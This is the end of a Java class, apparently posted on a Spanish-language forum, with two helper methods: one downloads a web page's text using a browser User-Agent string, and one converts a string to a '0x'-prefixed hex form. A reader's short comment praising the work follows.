    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }

    public static String encodehex(String text) {

//Thanks to Katarina Majetic
//Based on http://www.dzone.com/snippets/encode-string-hex

        byte[] z = text.getBytes();
        StringBuffer h = new StringBuffer();
        String l;
        int n;
        int a = z.length;
        int u;

        for (n = 0; n < a; n++) {
            u = z[n] & 0x000000FF;
            l = Integer.toHexString(u);
            h.append(l);
        }
        return "0x" + h.toString();
    }
}

//The End ?

  

[Slider324]

wow voy a darle una ojeada  muy buen trabajo